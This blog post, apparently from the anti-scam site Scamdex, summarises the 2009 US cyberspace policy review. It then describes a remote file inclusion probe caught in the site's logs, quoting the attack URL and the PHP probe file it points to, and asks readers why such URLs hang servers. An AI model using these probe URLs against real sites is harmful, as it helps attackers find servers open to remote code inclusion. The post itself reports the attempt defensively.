In February 2009, President Obama directed a 60-day review of the plans, programs and activities underway throughout the government that address communications and information infrastructure (i.e., cyberspace). The purpose was to develop a strategic framework to ensure that initiatives in this area are integrated, resourced and coordinated appropriately, both within the Executive Branch and with Congress and the private sector.

Taking a step backwards and acknowledging the inter-connectiveness of just-about-everything was an important step on the road to formulating some policies. What those policies are will be important for the whole world, not just the US. The fact is that your ability to buy a new book online from Amazon with one click also makes it easy for people to clean out your bank account or foreign aggressors to bring down your local power plant.

The review (read the whole thing here) makes 10 short-term action items:

1. Appoint a cybersecurity policy official (aka Cyber Czar) responsible for coordinating the Nation’s cybersecurity policies and activities, working within the NSC and NEC to coordinate interagency development of cybersecurity-related strategy and policy.
2. Prepare an updated national strategy to secure the information and communications infrastructure.
3. Designate cybersecurity as one of the President’s key management priorities and establish performance metrics.
4. Designate a privacy and civil liberties official to the NSC cybersecurity directorate.
5. Convene appropriate interagency mechanisms to conduct interagency-cleared legal analyses of priority cybersecurity-related issues.
6. Initiate a national public awareness and education campaign to promote cybersecurity.
7. Develop U.S. Government positions for an international cybersecurity policy framework.
8. Prepare a cybersecurity incident response plan.
9. Develop a framework for research and development strategies that focus on game-changing technologies that have the potential to enhance the security, reliability, resilience, and trustworthiness of digital infrastructure; provide the research community access to event data to facilitate developing tools, testing theories, and identifying workable solutions.
10. Build a cybersecurity-based identity management vision and strategy that addresses privacy and civil liberties interests, leveraging privacy-enhancing technologies for the Nation.

Phew!

Scamdex is all for making the Internet safer and is prepared to give up a little of the immense freedom we currently hold dear but if this just becomes a handover of ‘control’ to Government-backed special interests then it will be a cynical and sad exercise. A light touch is what is needed, not a hammer!

Melissa Hathaway, Cybersecurity Chief at the National Security Council, had something to add on her blog

… cyberspace underpins almost every facet of modern society and provides critical support for the U.S. economy, civil infrastructure, public safety and national security.

Protecting cyberspace requires strong vision and leadership and will require changes in policy, technology, education, and perhaps law. The 60-day cyberspace policy review summarizes our conclusions and outlines the beginning of a way forward in building a reliable, resilient, trustworthy digital infrastructure for the future. There are opportunities for everyone—individuals, academia, industry, and governments—to contribute toward this vision. During the review we engaged in more than 40 meetings and received and read more than 100 papers that informed our recommendations. As you will see in our review there is a lot of work for us to do together and an ambitious action plan to accomplish our goals. It must begin with a national dialogue on cybersecurity and we should start with our family, friends, and colleagues.

We are late in addressing this critical national need and our response must be focused, aggressive, and well-resourced. … Ensuring that cyberspace is sufficiently resilient and trustworthy to support U.S. goals of economic growth, civil liberties and privacy protections, national security, and the continued advancement of democratic institutions requires making cybersecurity a national priority.

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts  is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly  ‘go away page‘ .

In this case, the URL carries a payload that is itself a  link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ’sKriptKiDee’, aka ‘Wanker’  on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?

Analyzing the url gets me to this reduction of required parts:

* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?